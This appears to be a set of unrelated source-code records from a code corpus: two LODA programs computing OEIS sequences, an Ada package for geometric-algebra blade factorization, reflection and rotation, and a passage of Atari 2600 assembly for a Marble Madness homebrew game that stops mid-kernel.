oeis/097/A097834.asm	neoneye/loda-programs	11	93922	; A097834: Chebyshev polynomials S(n,27) + S(n-1,27) with Diophantine property. ; Submitted by <NAME> ; 1,28,755,20357,548884,14799511,399037913,10759224140,290100013867,7821941150269,210902311043396,5686540457021423,153325690028535025,4134107090313424252,111467565748433919779,3005490168117402409781,81036766973421431144308,2184987218114261238486535,58913618122111632007992137,1588482702078899802977301164,42830119338008183048379139291,1154824739424142042503259459693,31137437845113826964539626272420,839555997078649186000066649895647,22636874483278414195037259920910049 mov $2,2 mov $3,1 lpb $0 sub $0,1 mov $1,$3 mul $1,25 add $2,$1 add $3,$2 lpe mov $0,$3
ga_ref_impl/src/multivector_utilities.adb	rogermc2/GA_Ada	3	5830	with Ada.Text_IO; use Ada.Text_IO; with Interfaces; with Bits; with Blade; with Blade_Types; -- with GA_Utilities; with Metric; with Multivector_Type; package body Multivector_Utilities is -- Factorize_Blades returns the k unit factors of the blade and -- the scale of the blade function Factorize_Blades (MV_B : Multivectors.Multivector; Scale : out Float) return Multivectors.Multivector_List is use Interfaces; use Blade; use Multivectors; MV_Type_Rec : Multivector_Type.MV_Type_Record; K_Grade : Integer := 0; Grade_Valid : Grade_Status; E_Largest : Basis_Blade; Basis_Bit : Unsigned_32; B_Current : Multivector; aFactor : Multivector; Factors : Multivector_List; E_Array : Basis_Blade_Array (1 .. Space_Dimension); E_Bitmap : Unsigned_32; Idx : Integer := 0; begin if Space_Dimension < 1 then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blades Geometry type has not been set."; end if; if not Is_Null (MV_B) then Grade_Valid := Grade (MV_B, K_Grade); if Grade_Valid = Grade_Inhomogeneous then MV_Type_Rec := Multivector_Type.Init (MV_B); K_Grade := Multivector_Type.MV_Grade (MV_Type_Rec); elsif Grade_Valid = Grade_Null then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blades null grade multivector detected."; end if; -- set scale of output if K_Grade = 0 then Scale := Scalar_Part (MV_B); else Scale := Norm_E (MV_B); end if; -- Put_Line ("Multivector_Utilities.Factorize_Blades, K_Grade:" & -- Integer'Image (K_Grade)); if K_Grade > 0 and Scale /= 0.0 then -- not a scalar-blade or a null-blade -- get largest basis blade E_Largest := Largest_Basis_Blade (MV_B); E_Bitmap := Bitmap (E_Largest); -- GA_Utilities.Print_Blade ("Multivector_Utilities.Factorize_Blades, E_Largest", -- E_Largest); -- Put_Line ("Multivector_Utilities.Factorize_Blades, E_Bitmap" -- & Unsigned_32'Image (E_Bitmap)); -- Determine the K basis vectors that span the largest basis blade for Index_G in 0 .. Space_Dimension - 1 loop -- Shift 1 left by Index_G bits Basis_Bit := Shift_Left (1, Index_G); if (E_Bitmap and Basis_Bit) /= 0 then Idx := Idx + 1; E_Array (Idx) := New_Basis_Blade (Basis_Bit); end if; end loop; -- GA_Utilities.Print_Blade_String_Array -- ("Multivector_Utilities.Factorize_Blades, basis vectors that span the largest basis blade", E_Array, -- Blade_Types.Basis_Names_C3GA); -- setup the 'current input blade' B_Current := Geometric_Product (MV_B, 1.0 / Scale); -- for all but one of the E_Array basis vectors: for index in 1 .. Space_Dimension - 1 loop -- Project basis vector E_Array (index) onto B_Current -- (E(i) lc B_Current) inv(B_Current) but -- inv(B_Current) not required because Bc is a unit vector aFactor := New_Multivector (E_Array (index)); aFactor := Inner_Product (Inner_Product (aFactor, B_Current, Left_Contraction), B_Current, Left_Contraction); if not Is_Null (aFactor) then -- Normalize aFactor aFactor := Unit_E (aFactor); Add_Multivector (Factors, aFactor); -- Remove aFactor from B_Current B_Current := Inner_Product (aFactor, B_Current, Left_Contraction); end if; end loop; -- last factor = what is left of the input blade -- B_Current is already normalized but -- renormalize to remove any floating point round-off error Add_Multivector (Factors, Unit_E (B_Current)); end if; end if; return Factors; exception when others => Put_Line ("An exception occurred in Multivector_Utilities.Factorize_Blades"); raise; end Factorize_Blades; -- ------------------------------------------------------------------------ function Factorize_Blade_Fast (MV_B : Multivectors.Multivector; Scale : out Float) return Multivectors.Multivector_List is use Interfaces; use Blade; use Blade_Types; use Multivectors; Grade_K : Unsigned_32; Sc : Float; Blade_E : Basis_Blade; Lowest_Bit : Integer; Highest_Bit : Integer; Blades_B : Blade_List; Basis_Bit : Unsigned_32; Basis_Bitmap : Unsigned_32; Vec_Bitmap : Unsigned_32; Blades_Bj : Basis_Blade; Factors : Multivector_List; -- F L_List : Blade_List; begin if Space_Dimension < 1 then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blades Geometry type has not been set."; end if; if Grade (MV_B, Integer (Grade_K)) /= Grade_OK then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blade inhomogenous multivector detected."; else if Grade_K = 0 then Scale := Scalar_Part (MV_B); else Scale := Norm_E (MV_B); end if; if Grade_K > 0 and Scale /= 0.0 then Blade_E := Largest_Basis_Blade (MV_B); Lowest_Bit := Bits.Lowest_One_Bit (Bitmap (Blade_E)); Highest_Bit := Bits.Highest_One_Bit (Bitmap (Blade_E)); if Grade_K = 1 then Add_Multivector (Factors, Unit_E (MV_B)); else if Weight (Blade_E) < 0.0 then -- positive scale for blade needed Scale := - Scale; -- take care of orientation of blade: if (Grade_K and 1) = 1 then Scale := - Scale; end if; end if; -- fix sign issues if (Grade_K mod 4) = 2 then Scale := - Scale; end if; Blades_B := Blades (MV_B); for index in Lowest_Bit .. Highest_Bit loop Basis_Bit := Shift_Left (1, Integer (index)); if (Bitmap (Blade_E) and Basis_Bit) /= 0 then Basis_Bitmap := Bitmap (Blade_E) xor Basis_Bit; New_Line; for index_j in 1 .. List_Length (Blades_B) loop Blades_Bj := BB_Item (Blades_B, index_j); if (Bitmap (Blades_Bj) and Basis_Bitmap) = Basis_Bitmap then Vec_Bitmap := Bitmap (Blades_Bj) xor Basis_Bitmap; Sc := Weight (Blades_Bj) * Canonical_Reordering_Sign (Basis_Bitmap, Bitmap (Blades_Bj)); Blade.Add_Blade (L_List, New_Basis_Blade (C3_Base'Enum_Val (Vec_Bitmap), Sc)); end if; end loop; end if; Add_Multivector (Factors, New_Multivector (L_List)); end loop; end if; else Add_Multivector (Factors, New_Multivector (0.0)); end if; end if; return Factors; exception when others => Put_Line ("An exception occurred in Multivector_Utilities.Factorize_Blade_Fast"); raise; end Factorize_Blade_Fast; -- -------------------------------------------------------------------- function Reflect (MV : Multivectors.Multivector; DP : Multivectors.Dual_Plane) return Multivectors.Multivector is use Metric; use Multivectors; IDP : constant Multivector := General_Inverse (DP, C3_Metric); begin return Geometric_Product (-DP, Geometric_Product (MV, IDP, C3_Metric), C3_Metric); end Reflect; -- ------------------------------------------------------------------------ function Rotate (MV : Multivectors.Multivector; aVersor : Multivectors.TR_Versor) return Multivectors.Multivector is use Metric; use Multivectors; IV : constant Multivector := General_Inverse (aVersor, C3_Metric); begin return Geometric_Product (aVersor, Geometric_Product (MV, IV, C3_Metric), C3_Metric); end Rotate; -- ------------------------------------------------------------------------ end Multivector_Utilities;
oeis/241/A241572.asm	neoneye/loda-programs	11	18697	<filename>oeis/241/A241572.asm ; A241572: Numbers n such that 2*n+17 is not a prime. ; Submitted by <NAME>(s1.) ; 2,4,5,8,9,11,14,16,17,19,20,23,24,26,29,30,32,34,35,37,38,39,41,44,47,49,50,51,52,53,54,56,58,59,62,63,64,65,68,69,71,72,74,76,77,79,80,83,84,85,86,89,92,93,94,95,96,98,99,100,101,102,104,107,109,110,113,114,115,116,118,119,121,122,124,125,128,129,131,134,135,136,137,139,140,141,142,143,144,146,149,151,152,153,154,155,156,158,159,161 add $0,3 mov $1,4 mov $2,1 lpb $0 mov $3,$2 lpb $3 add $2,2 mov $4,$1 gcd $4,$2 cmp $4,1 sub $3,$4 lpe sub $0,1 add $2,2 mul $1,$2 lpe mov $0,$2 div $0,2 sub $0,8
marble.asm	johnkharvey/marble_madness_2600	1	13496	;=================================== ; "<NAME>" ; -- The Beginner Race ; ; (for your Atari 2600) ;=================================== ;=================================== ; Special Thanks: ; - grafixbmp ;=================================== ;=================================== ; Bank Layouts ; Bank 1 = Graphics/kernels ; Bank 2 = Collision detection handling after Bank3/Bank4 table lookup ; Bank 3 = Collision table processing for left side of screen ; Bank 4 = Collision table processing for right side of screen ;=================================== ;=================================== ; RAM Allocation ;=================================== ;--------------------- ; $80-$8F = Normal variables ;--------------------- Temp = $80 ; potentially a WORD ;------------ ; Allows us to switch banks and go to a location ; in the new bank ;------------ ReturnAddress = $82 ; a WORD SecondsRemaining = $84 FrameCounter = $85 LevelNumber = $86 LeftNumber = $87 ; and $88 RightNumber = $89 ; and $8A ; 0 = start screen / direction select screen ; 1 = level 1 play ; 2 = level 1 win GamePhase = $8B NinetyDegrees = $8C ; 0 = 90, 1 = 45 IncreasingCounter = $8D CollisionStatusFromTable = $8E ;--------------------- ; $90-$9F = Screen variables ;--------------------- SWCHAStore = $90 ScrollPointerTop = $91 ScrollPointerBottom = $92 OddFrameCheck = $93 Player0HPosition = $94 Player1HPosition = $95 Player0VPosition = $96 Player0VPosition2 = $97 ; just a bit used to slow things down Player0HPositionA = $98 Player0VPositionA = $99 Player0SpeedDown = $9A Player0SpeedUp = $9B Player0SpeedLeft = $9C Player0SpeedRight = $9D CollisionByte = $9E MarbleFallStatus = $9F ;--------------------- ; $A0-$AF = Marble RAM ;--------------------- P0MarbleRAM = $A0 ; 8 bytes ; Next is $A8 ;=================================== ; Constants NTSC = 1 DEBUG = 0 LEVEL = 0 MAXLEVELHEIGHT = 200 ANGLE_PIPE = %00000000 ANGLE_SLASH = %01000000 ANGLE_BACKSLASH = %10000000 ANGLE_MINUS = %11000000 ;=================================== ;=================================== processor 6502 include hdr/vcs.h ;=================================== MAC JUMP_TABLE ; put this at the start of every bank RORG $F000 Bank1 cmp SelectBank1 ; 3 bytes jmp Bank1Code ; 3 bytes Bank2 cmp SelectBank2 ; 3 bytes jmp Bank2Code ; 3 bytes Bank3 cmp SelectBank3 ; 3 bytes jmp Bank3Code ; 3 bytes Bank4 cmp SelectBank4 ; 3 bytes jmp Bank4Code ; 3 bytes ENDM ;=================================== MAC BANKS_AND_VECTORS; put this at the end of every bank ;RORG $FFF8 RORG $FFF6 SelectBank1 .byte $00 SelectBank2 .byte $00 SelectBank3 .byte $00 SelectBank4 .byte $00 .word Bank1; NMI .word Bank1; RESET .word Bank1; IRQ ENDM ;=================================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 1 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $C000 ;============ JUMP_TABLE org $C018 rorg $F018 ;================= Bank1Code ;================= LDA ReturnAddress+1 CMP #>AfterCollision_InBank1 BNE TestReturnAddress2 LDA ReturnAddress CMP #<AfterCollision_InBank1 BNE TestReturnAddress2 JMP AfterCollision_InBank1 TestReturnAddress2 ;================= Start ;================= SEI CLD LDX #$FF TXS LDA #0 ClearingRAM STA 0,X ; clear $FF through $1 (not $0, VSYNC). DEX BNE ClearingRAM ; Stuff for First screen LDA #0 ; startup phase "Marble Madness" screen STA GamePhase STA NinetyDegrees STA FrameCounter ; zero-frame for seconds timer ;================= GameInitBank1 ;================= ; Do init stuff LDA #200 STA ScrollPointerTop ; highest for practiceLevel LDA #(200-89) STA ScrollPointerBottom ; lowest LDA #1 STA OddFrameCheck ; even frame LDA #78 STA Player0HPosition LDA #189 STA Player0VPosition ; these are divided by 2, so pos is 20. LDA #0 STA Player0VPosition2 ; 0 or 1, frame counter to slow ball STA Player0HPositionA ; speed STA Player0VPositionA ; speed STA Player0SpeedDown STA Player0SpeedUp STA Player0SpeedLeft STA Player0SpeedRight STA LevelNumber ; level zero STA MarbleFallStatus LDA #$60 ; BCD, so hex STA SecondsRemaining LDA #>Numbers STA RightNumber+1 STA LeftNumber+1 ;================= MainLoopBank1 ;================= JSR VerticalBlankBank1 ; Execute the vertical blank. ; different game phases have different kernels INC IncreasingCounter ; always increases LDA GamePhase BNE NotGamePhaseZero ; Game phase zero JSR ResetSelectCheck JSR GameCalcStartScreenBank1 ; Do calculations during Vblank JSR TitleScreenBank1 ; Draw the screen JMP AfterDrawScreen NotGamePhaseZero CMP #1 BEQ GamePhaseOne CMP #2 BEQ GamePhaseTwo JMP AfterDrawScreen GamePhaseOne GamePhaseTwo JSR ResetSelectCheck JSR GameCalcBank1 ; Do calculations during Vblank JSR DrawScreenBank1 ; Draw the screen AfterDrawScreen JSR OverScanBank1 ; Do more calculations during overscan ;================== JMP MainLoopBank1 ; Continue forever. ;================== ;================= VerticalBlankBank1 ;================= LDX #0 LDA #2 STA WSYNC STA VSYNC ; Begin vertical sync. STA WSYNC ; First line of VSYNC STA WSYNC ; Second line of VSYNC. IF NTSC LDA #44 ELSE ; (PAL) LDA #54 ENDIF STA TIM64T LDA #0 ; Now we can end the VSYNC period. STA WSYNC ; Third line of VSYNC. STA VSYNC ; (0) ;================== RTS ;================== ;======================== ; Reset/select pressed ;======================== ResetSelectCheck LDA SWCHB AND #%00000001 BNE ResetNotPressed LDX #$FF TXS IF NTSC LDY #0 LDX #249 ELSE ; PAL LDY #1 LDX #43 ENDIF WsyncLoopOnReset STA WSYNC DEX BNE WsyncLoopOnReset DEY BPL WsyncLoopOnReset JMP GameInitBank1 ResetNotPressed RTS ;================= ;================= GameCalcStartScreenBank1 ;================= ; if fire button pressed, then game on LDA INPT4 BMI LeftFireButtonNotPressed LDA #1 STA GamePhase LeftFireButtonNotPressed ; if left/right pressed, increase 90orf5 LDA SWCHA BPL RightPressedStartScreen ROL BPL LeftPressedStartScreen JMP AfterLeftRightStartScreen RightPressedStartScreen LDA #1 STA NinetyDegrees JMP AfterLeftRightStartScreen LeftPressedStartScreen LDA #0 STA NinetyDegrees AfterLeftRightStartScreen RTS ;================= GameCalcBank1 ;================= ;================= ; Deal with timer countdown ;================= LDA SecondsRemaining BNE GameNotOver ; Game Over JMP NoPlayerMovement GameNotOver INC FrameCounter LDA FrameCounter CMP #60 BNE Not60Frames LDA #0 STA FrameCounter SED ; BCD IF DEBUG = 1 LDA SecondsRemaining SEC SBC #0 STA SecondsRemaining ELSE LDA GamePhase CMP #2 BEQ WeWonDontDecTimer LDA SecondsRemaining SEC SBC #1 STA SecondsRemaining WeWonDontDecTimer ENDIF CLD ; back to normal math Not60Frames ;================= ;================= LDA SWCHA STA SWCHAStore ;================= ;================= LDA MarbleFallStatus BEQ TransformSWCHA JMP InitialJoyCheckDone ;================= ;================= ; Transform SWCHA - based on 45 or 90 ;================= TransformSWCHA LDA NinetyDegrees BEQ DealWithUp ; 45 degree transformation ; right / left / down / up LDA SWCHAStore BPL Transform45Right ROL BPL Transform45Left ROL BPL Transform45Down ROL BPL Transform45Up JMP DealWithUp ; nothing really to do, no direction pressed Transform45Right LDA #%01011111 ; right goes down and right STA SWCHAStore JMP DealWithUp ; first transformation done Transform45Left LDA #%10101111 ; left goes up and left STA SWCHAStore JMP DealWithUp ; first transformation done Transform45Down LDA #%10011111 ; down goes down and left STA SWCHAStore JMP DealWithUp ; first transformation done Transform45Up LDA #%01101111 ; up goes up and right STA SWCHAStore ; first transformation done ;================= ; Transform SWCHA - based on inertia ;================= DealWithUp LDA SWCHAStore AND #%00010000 ; up BNE UpNotPressed ; Up pressed. Are we going down? LDA Player0SpeedDown BEQ NotMovingDownAndUpPressed DEC Player0SpeedDown DEC Player0SpeedDown JMP DontMoveUp NotMovingDownAndUpPressed ; LDA Player0SpeedUp CMP #$FE ; going top speed? BEQ UpNotPressed INC Player0SpeedUp INC Player0SpeedUp UpNotPressed LDA Player0SpeedUp CLC ADC Player0VPositionA STA Player0VPositionA BCC DontMoveUp LDA SWCHAStore AND #%11101111 STA SWCHAStore JMP DealWithDown DontMoveUp LDA SWCHAStore ORA #%00010000 STA SWCHAStore ;================= DealWithDown LDA SWCHAStore AND #%00100000 ; down BNE DownNotPressed ; Down Pressed. Are we going up? LDA Player0SpeedUp BEQ NotMovingUpAndDownPressed DEC Player0SpeedUp DEC Player0SpeedUp JMP DontMoveDown NotMovingUpAndDownPressed LDA Player0SpeedDown CMP #$FE BEQ DownNotPressed INC Player0SpeedDown INC Player0SpeedDown DownNotPressed ;LDA Player0SpeedDown ;CLC ;ADC Player0VPositionA ;STA Player0VPositionA LDA Player0VPositionA SEC SBC Player0SpeedDown STA Player0VPositionA ; BCS DontMoveDown LDA SWCHAStore AND #%11011111 STA SWCHAStore JMP DealWithLeft DontMoveDown LDA SWCHAStore ORA #%00100000 STA SWCHAStore ;================= DealWithLeft LDA SWCHAStore AND #%01000000 ; left BNE LeftNotPressed ; Left pressed. Are we going right? LDA Player0SpeedRight BEQ NotMovingRightAndLeftPressed DEC Player0SpeedRight DEC Player0SpeedRight JMP DontMoveLeft NotMovingRightAndLeftPressed LDA Player0SpeedLeft CMP #$FE ; going top speed? BEQ LeftNotPressed INC Player0SpeedLeft INC Player0SpeedLeft LeftNotPressed ;LDA Player0SpeedLeft ;CLC ;ADC Player0HPositionA ;STA Player0HPositionA LDA Player0HPositionA SEC SBC Player0SpeedLeft STA Player0HPositionA ; BCS DontMoveLeft LDA SWCHAStore AND #%10111111 STA SWCHAStore JMP DealWithRight DontMoveLeft LDA SWCHAStore ORA #%01000000 STA SWCHAStore ;================= DealWithRight LDA SWCHAStore AND #%10000000 ; right BNE RightNotPressed ; Right pressed. Are we going left? LDA Player0SpeedLeft BEQ NotMovingLeftAndRightPressed DEC Player0SpeedLeft DEC Player0SpeedLeft JMP DontMoveRight NotMovingLeftAndRightPressed ; LDA Player0SpeedRight CMP #$FE ; going top speed? BEQ RightNotPressed INC Player0SpeedRight INC Player0SpeedRight RightNotPressed LDA Player0SpeedRight CLC ADC Player0HPositionA STA Player0HPositionA BCC DontMoveRight LDA SWCHAStore AND #%01111111 STA SWCHAStore JMP NoMoreDirections DontMoveRight LDA SWCHAStore ORA #%10000000 STA SWCHAStore NoMoreDirections ;================= ;================= ; Joystick up/down movement ;================= RealJoyChecks LDA SWCHAStore AND #%00010000 ; up BNE CheckDown HandleDown ; Can we move Player0 down? LDA Player0VPosition ; start value 160 SEC SBC ScrollPointerBottom CMP #80 BEQ ScrollFrameDown ; otherwise, move the ball down INC Player0VPosition2 LDA Player0VPosition2 AND #1 BNE CheckDown INC Player0VPosition JMP CheckDown ScrollFrameDown LDA ScrollPointerTop CMP #MAXLEVELHEIGHT BEQ CheckDown LDA OddFrameCheck BNE ScrollDown2 INC OddFrameCheck JMP CheckDown ; can turn to BNE later ScrollDown2 LDA #0 STA OddFrameCheck INC ScrollPointerTop INC ScrollPointerBottom CheckDown LDA SWCHAStore AND #%00100000 ; down BNE CheckRight HandleUp ; Can we move Player0 up? LDA Player0VPosition ; start value 160 SEC SBC ScrollPointerBottom CMP #10 BEQ ScrollFrameUp ; otherwise, move the ball up INC Player0VPosition2 LDA Player0VPosition2 AND #1 BNE CheckRight DEC Player0VPosition JMP CheckRight ScrollFrameUp LDA ScrollPointerTop CMP #89 ; always the bottom BEQ CheckRight LDA OddFrameCheck BEQ ScrollUp2 DEC OddFrameCheck JMP CheckRight ScrollUp2 LDA #1 STA OddFrameCheck DEC ScrollPointerTop DEC ScrollPointerBottom CheckRight LDA SWCHAStore AND #%10000000 ; right BNE CheckLeft LDA Player0HPosition CMP #136 ; right hand extrema BEQ CheckLeft INC Player0HPosition CheckLeft LDA SWCHAStore AND #%01000000 ; left BNE InitialJoyCheckDone LDA Player0HPosition CMP #16 ; left hand extrema BEQ InitialJoyCheckDone DEC Player0HPosition InitialJoyCheckDone ;================= ;================= ; set up P0/P1 for timer for frame ;================= NoPlayerMovement STA WSYNC LDY #7 PlayerCoarseLoop DEY BPL PlayerCoarseLoop NOP STA RESP0 STA RESP1 LDA #%00110000 STA HMP0 LDA #%01000000 STA HMP1 STA WSYNC STA HMOVE ;================== ;================== ; Load Marble data into RAM ;================== LDA MarbleFallStatus BEQ KeepMarbleSame ; play a noise LDA #6 STA AUDC0 LDA #7 STA AUDV0 LDA MarbleFallStatus STA AUDF0 ; other stuff LDA IncreasingCounter AND #%00000111 BNE KeepMarbleSame INC MarbleFallStatus LDA MarbleFallStatus CMP #8 BNE KeepMarbleSame LDA #0 STA MarbleFallStatus KeepMarbleSame LDX #7 LDA #7 CLC ADC MarbleFallStatus ;SEC ;SBC #1 ; just in case TAY P0MarbleInRamLoop LDA Marble1,Y STA P0MarbleRAM,X DEY DEX BPL P0MarbleInRamLoop LDA #0 STA P0MarbleRAM RTS ;================== RTS ;================== ;================== ;ORG $C400 align 256 ;================== Numbers ; Should be on a page boundary to be effective NumberZero dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b 0 NumberOne dc.b %00011100 dc.b %00001000 dc.b %00001000 dc.b %00001000 dc.b %00001000 dc.b %00011000 dc.b %00001000 dc.b 0 NumberTwo dc.b %00111100 dc.b %00100000 dc.b %00100000 dc.b %00011000 dc.b %00000100 dc.b %00100100 dc.b %00011000 dc.b 0 NumberThree dc.b %00111000 dc.b %00000100 dc.b %00000100 dc.b %00011000 dc.b %00000100 dc.b %00000100 dc.b %00111000 dc.b 0 NumberFour dc.b %00000100 dc.b %00000100 dc.b %00000100 dc.b %00111100 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b 0 NumberFive dc.b %00011000 dc.b %00100100 dc.b %00000100 dc.b %00011000 dc.b %00100000 dc.b %00100000 dc.b %00111100 dc.b 0 NumberSix dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00111000 dc.b %00100000 dc.b %00100000 dc.b %00011000 dc.b 0 NumberSeven dc.b %00010000 dc.b %00010000 dc.b %00001000 dc.b %00001000 dc.b %00000100 dc.b %00000100 dc.b %00111100 dc.b 0 NumberEight dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b 0 NumberNine dc.b %00011000 dc.b %00100100 dc.b %00000100 dc.b %00011100 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b 0 Marble1 IF DEBUG == 1 ; debug marble dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00011000 dc.b %00000000 dc.b %00011000 dc.b %00000000 dc.b %00000000 ELSE dc.b %00000000 dc.b %00011000 dc.b %00111100 dc.b %01111110 dc.b %01111110 dc.b %01111110 dc.b %00111100 dc.b %00011000 ENDIF ; Marble space dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 dc.b %00000000 JoyStickGfx90 dc.b %00000000 dc.b %11101110 dc.b %00101010 dc.b %00101010 dc.b %11101010 dc.b %10101010 dc.b %10101010 dc.b %11101110 JoyStickGfx45 dc.b %00000000 dc.b %00101110 dc.b %00100010 dc.b %00100010 dc.b %11101110 dc.b %10101000 dc.b %10101000 dc.b %10101110 ;================= TitleScreenBank1 ;================= LDA INTIM BNE TitleScreenBank1 ; Whew! STA WSYNC ; [0] STA VBLANK ; Enable drawing again (set vblank to 0) LDA #0 STA COLUBK LDA #1 STA CTRLPF ; reflected LDA #$0E STA COLUP0 STA COLUP1 LDX NinetyDegrees LDA IncreasingCounter LSR AND #$0F STA COLUP0,X NOP NOP STA RESP0 NOP NOP NOP STA RESP1 LDY #10 TitleScreenLoop1 STA WSYNC DEY BNE TitleScreenLoop1 ;---------- LDY #53 ; screen logo 54 high (can be 108) TitleScreenLoop2 ;LDA #$88 ;STA COLUBK ;STA WSYNC ;DEY ;BPL TitleScreenLoop2 ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Title_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Title_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Title_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Title_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY BPL TitleScreenLoop2 ;======================= LDA #0 STA COLUBK STA PF1 STA PF2 LDY #40 TitleScreenLoop3 STA WSYNC DEY BNE TitleScreenLoop3 LDY #7 TitleScreenLoop4 LDA JoyStickGfx90,Y STA GRP0 LDA JoyStickGfx45,Y STA GRP1 STA WSYNC DEY BPL TitleScreenLoop4 LDY #79 TitleScreenLoop5 STA WSYNC DEY BNE TitleScreenLoop5 ;================= JMP CleanupScreen ;================= ;================= DrawScreenBank1 ;================= LDA INTIM BNE DrawScreenBank1 ; Whew! STA WSYNC ; [0] STA VBLANK ; Enable drawing again (set vblank to 0) ; First 2 lines of kernel are set-up for main stuff. ;LDA #0 ;STA COLUBK LDA #1 STA CTRLPF ; reflected ;=========== ; DRAW THE TIMER section IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF STA COLUPF LDA #$0E ; same as NTSC/PAL STA COLUP0 STA COLUP1 LDA #$C0 STA PF2 LDA SecondsRemaining AND #%00001111 ; mask out right digit ASL ASL ASL STA RightNumber LDA SecondsRemaining AND #%11110000 ; mask out left digit CLC LSR STA LeftNumber LDY #6 STA WSYNC ; 1 blue line for score ScoreLoop LDA (LeftNumber),Y ;LDA NumberFive,Y STA GRP0 LDA (RightNumber),Y ;LDA NumberFive,Y STA GRP1 STA WSYNC DEY BPL ScoreLoop LDA #0 STA GRP0 STA GRP1 IF NTSC IF DEBUG = 1 LDA #$0E ELSE LDA #$82 ; blue ENDIF ELSE ; (PAL) LDA #$D2 ; blue ENDIF STA COLUP0 ; Define player 2 as red ;=========== ;LDY #(89-1) ; (89*2 = 178 + 8 + 2 + 4 on top = 192) LDY ScrollPointerTop DEY ; we need to set P0's position. ;==================== ; Calculate P1,P0 HPos ;==================== ; coarse/fine setting of P1 graphic HPos ; code by vdub_bobby LDX #0 LDA Player0HPosition NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP STX PF2 ; Calculate Player's left/right position on screen CalculatePlayersHPosLoop sec sta HMCLR sta WSYNC ; [5] DivideLoopPlayersBank1 sbc #15 bcs DivideLoopPlayersBank1 eor #7 asl asl asl asl sta.wx HMP0,X sta RESP0,X sta WSYNC ; [6] sta HMOVE STA WSYNC ; without this line, we screw up P1 positioning by ; touching HMP1 with an HMCLR too early on P0 positioning ;DEX ;LDA Player1HPosition ;BPL CalculatePlayersHPosLoop STA WSYNC ; to even out ;========== LDA OddFrameCheck BEQ DrawLoopBank1Pass1 STA WSYNC ; [1] ;========== DrawLoopBank1Pass1 ;========== STA WSYNC ; [2, 4 = first even frame completed] ;========== LDA #$08 ; white ; [2] (same as NTSC and PAL) STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_WhiteData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_WhiteData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_WhiteData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_WhiteData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF LEVEL == 0 IF NTSC LDA #$22 ; brown ELSE ; (PAL) LDA #$42 ; brown ENDIF ENDIF IF LEVEL == 1 IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_BlueData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_BlueData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_BlueData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_BlueData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY ;CPY ScrollPointerBottom CPY Player0VPosition BNE DrawLoopBank1Pass1 ;======================= ;================= LDX #7 ; marble frames DrawLoopBank1Pass2 ;========== STA WSYNC ; [2, 4 = first even frame completed] ;========== LDA #$08 ; white ; [2] (same as NTSC and PAL) STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_WhiteData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA P0MarbleRAM,X ; [4 , 16] STA GRP0 ; [3, 19] LDA Level_0_WhiteData_PF2_2,Y ; [4, 23] STA PF2 ; [3, 26] NOP ; [2, 28] NOP ; [2, 30] NOP ; [2, 32] NOP ; [2, 34] LDA Level_0_WhiteData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_WhiteData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEX ; marble pointer ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF LEVEL == 0 IF NTSC LDA #$22 ; brown ELSE ; (PAL) LDA #$42 ; brown ENDIF ENDIF IF LEVEL == 1 IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_BlueData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA P0MarbleRAM,X ; [4 , 16] STA GRP0 ; [3, 19] LDA Level_0_BlueData_PF2_2,Y ; [4, 23] STA PF2 ; [3, 26] NOP 